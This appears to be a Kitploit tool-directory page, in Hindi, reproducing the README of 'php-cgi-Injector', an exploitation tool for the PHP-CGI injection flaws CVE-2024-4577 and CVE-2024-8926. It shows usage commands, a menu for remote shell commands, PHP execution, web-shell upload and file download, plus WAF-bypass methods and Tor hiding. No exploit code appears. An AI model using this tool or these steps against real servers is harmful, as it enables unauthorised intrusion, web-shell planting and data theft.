Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
php-cgi-Injector — 一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具 | Kitploit
उपकरण/GitHubGitHub/night-have-dreams/php-cgi-injector
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration TestingCommand and Control
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具

रिपॉजिटरी देखें
4921 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP-CGI Injector

🚀 CVE-2024-4577 और CVE-2024-8926 शोषण उपकरण

PHP-CGI पैरामीटर इंजेक्शन भेद्यता के लिए एक स्वचालित परीक्षण उपकरण, जो CVE-2024-4577 और CVE-2024-8926 का समर्थन करता है, और कमांड निष्पादन, फ़ाइल अपलोड, डाउनलोड आदि संचालन कर सकता है।


📌 परिचय

यह उपकरण PHP-CGI वातावरण में पैरामीटर इंजेक्शन भेद्यता का परीक्षण करने के लिए उपयोग किया जा सकता है, और प्रदान करता है:

  • ✅ शानदार टर्मिनल इंटरफ़ेस और एनिमेशन प्रभाव
  • ✅ स्वचालित भेद्यता स्कैनिंग
  • ✅ विभिन्न आक्रमण मोड (शेल, PHP कोड निष्पादन, फ़ाइल अपलोड/डाउनलोड)
  • ✅ डिफ़ॉल्ट और कस्टम पेलोड संयोजन
  • ✅ Tor ट्रैफ़िक छिपाने का मोड
  • ✅ विभिन्न Bypass WAF मॉड्यूल
  • ✅ आउटपुट एन्कोडिंग का स्वचालित रूपांतरण सहायता
  • ✅ बलपूर्वक भेद्यता शोषण मोड (भले ही भेद्यता स्कैन न की गई हो, फिर भी शुरू किया जा सकता है)
  • ❌ कॉफ़ी बनाने का समर्थन नहीं करता, लेकिन WAF को टोस्ट करने का समर्थन करता है।
  • ❌ आपके लिए रिपोर्ट लिखने, गर्लफ्रेंड ढूंढने या ग्रेजुएट स्कूल में प्रवेश पाने का समर्थन नहीं करता।
  • ❌ सोशल इंजीनियरिंग का समर्थन नहीं करता, कृपया स्वयं मनुष्यों का सामना करें।

📜 अस्वीकरण

यह उपकरण केवल कानूनी परीक्षण और शैक्षणिक उद्देश्यों के लिए है, कृपया अनधिकृत सिस्टम पर उपयोग न करें!

⚠️ अवैध उपयोग से कानूनी जिम्मेदारी होगी!

यह उपकरण केवल निम्नलिखित के लिए है:

  • 🔹 उद्यम रेड टीम पेनिट्रेशन टेस्टिंग
  • 🔹 CTF सुरक्षा अनुसंधान
  • 🔹 व्यक्तिगत सुरक्षा सीखना
  • 🔹 अन्य कानूनी रूप से अधिकृत सुरक्षा परीक्षण

📥 निर्भरताएँ स्थापित करें

यह उपकरण निम्नलिखित Python पैकेजों पर निर्भर करता है, कृपया पहले स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

या फिर मैन्युअल रूप से स्थापित करें:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ उपयोग विधि

📌 मूल उपयोग

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

उदाहरण:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 पैरामीटर विकल्प


📌 संचालन मोड

जब स्क्रिप्ट को भेद्यता मिलती है, तो यह एक मेनू प्रदर्शित करेगी:

root@kitploit:~
╭────────────  शोषण मोड मेनू  ────────────╮
│ वर्तमान लक्ष्य:http://example.com/              │
│ वर्तमान इंजेक्शन बिंदु:/php-cgi/php-cgi.exe           │
│ भेद्यता संख्या:CVE-2024-4577                    │
╰────────────────────────────────────────────╯
1) 🧪 शेल मोड
2) 🛠️ PHP कस्टम मोड
3) 📤 फ़ाइल अपलोड करें
4) 📥 फ़ाइल डाउनलोड करें
5) 🎯 आक्रमण लक्ष्य बदलें
6) ⚙️ पैरामीटर सेट करें
7) ❌ प्रोग्राम से बाहर निकलें
>>

📌 मोड विवरण

1️⃣ शेल मोड

सिस्टम कमांड निष्पादित करें:

root@kitploit:~
shell> whoami

📂 आउटपुट सहेजें

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ PHP कस्टम मोड

कस्टम PHP कोड निष्पादित करें:

root@kitploit:~
phpinfo();
EOF

📂 आउटपुट सहेजें

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ फ़ाइल अपलोड करें

root@kitploit:~
स्थानीय फ़ाइल पथ:C:\test\shell.php
लक्ष्य पूर्ण पथ:
[*] अपलोड पथ स्वचालित रूप से सेट किया गया: C:/xampp/htdocs/shell.php

📂 मैन्युअल रूप से पथ निर्दिष्ट करें

root@kitploit:~
लक्ष्य पूर्ण पथ:C:\xampp\php\shell.php

4️⃣ फ़ाइल डाउनलोड करें

root@kitploit:~
दूरस्थ फ़ाइल पथ:C:\xampp\htdocs\index.php

📂 फ़ाइल डाउनलोड करने के बाद download/ में सहेजी जाती है, यदि डुप्लिकेट हो तो स्वचालित रूप से नंबर जोड़ा जाता है

root@kitploit:~
[*] फ़ाइल डाउनलोड पूर्ण, download/index.php में सहेजी गई

5️⃣ आक्रमण लक्ष्य बदलें

root@kitploit:~
नया लक्ष्य URL दर्ज करें: http://newtarget.com

🔹 भेद्यता का पुनः परीक्षण करेगा


6️⃣ पैरामीटर स्विच करें

root@kitploit:~
[⚙️ उपयोग चरण पैरामीटर सेटिंग मेनू]

1) पेलोड बदलें        1
2) बाईपास मॉड्यूल         चयनित नहीं
3) प्रतीक्षा समय (टाइमआउट)        10 सेकंड
4) अनुरोध विलंब (डिले)          0 सेकंड
5) स्वचालित लॉग (लॉग)            बंद
6) विस्तृत मोड (वर्बोज़)         बंद
7) एनिमेशन प्रभाव (इफ़ेक्ट्स)         चालू
8) बलपूर्वक उपयोग (फ़ोर्स)          बंद
9) सहेजें और शोषण मेनू पर लौटें

📌 Bypass WAF बाईपास मॉड्यूल

निम्नलिखित बाईपास रणनीतियाँ प्रदान करता है:

  • CGI पथ विकृति
  • पेलोड के पहले और बाद में अमान्य वर्ण जोड़ना
  • php://input को अन्य लेखन से बदलना
  • विशिष्ट या यादृच्छिक HTTP हेडर जोड़ना
  • POST सामग्री को अस्पष्ट करना
  • पेलोड क्रम को यादृच्छिक रूप से बदलना
  • कस्टम बाईपास स्क्रिप्ट, प्रारूप के लिए tamper_example_template.txt देखें
टूल डाउनलोड करें
पैरामीटरविवरणउदाहरण
-u , --urlलक्ष्य URL निर्दिष्ट करें-u http://example.com
--timeout secअनुरोध टाइमआउट सेट करें (0 अनंत)--timeout 30
--logशेल कमांड को स्वचालित रूप से लॉग करें--log
--payloadपेलोड संयोजन निर्दिष्ट या कस्टम करें--payload 2
--torTor के माध्यम से अनुरोध भेजें--tor
--verboseविस्तृत जानकारी दिखाएँ--verbose
--bypassWAF बाईपास मोड सक्षम करें--bypass
--forceबलपूर्वक भेद्यता शोषण मोड में प्रवेश करें--force
--cgipoint PATHSपरीक्षण के लिए विशिष्ट CGI पथ निर्दिष्ट करें--cgipoint /path
--delay secप्रत्येक अनुरोध के बीच विलंब सेकंड--delay 1.5
--no-effectsसभी एनिमेशन और विलंब प्रभाव बंद करें--no-effects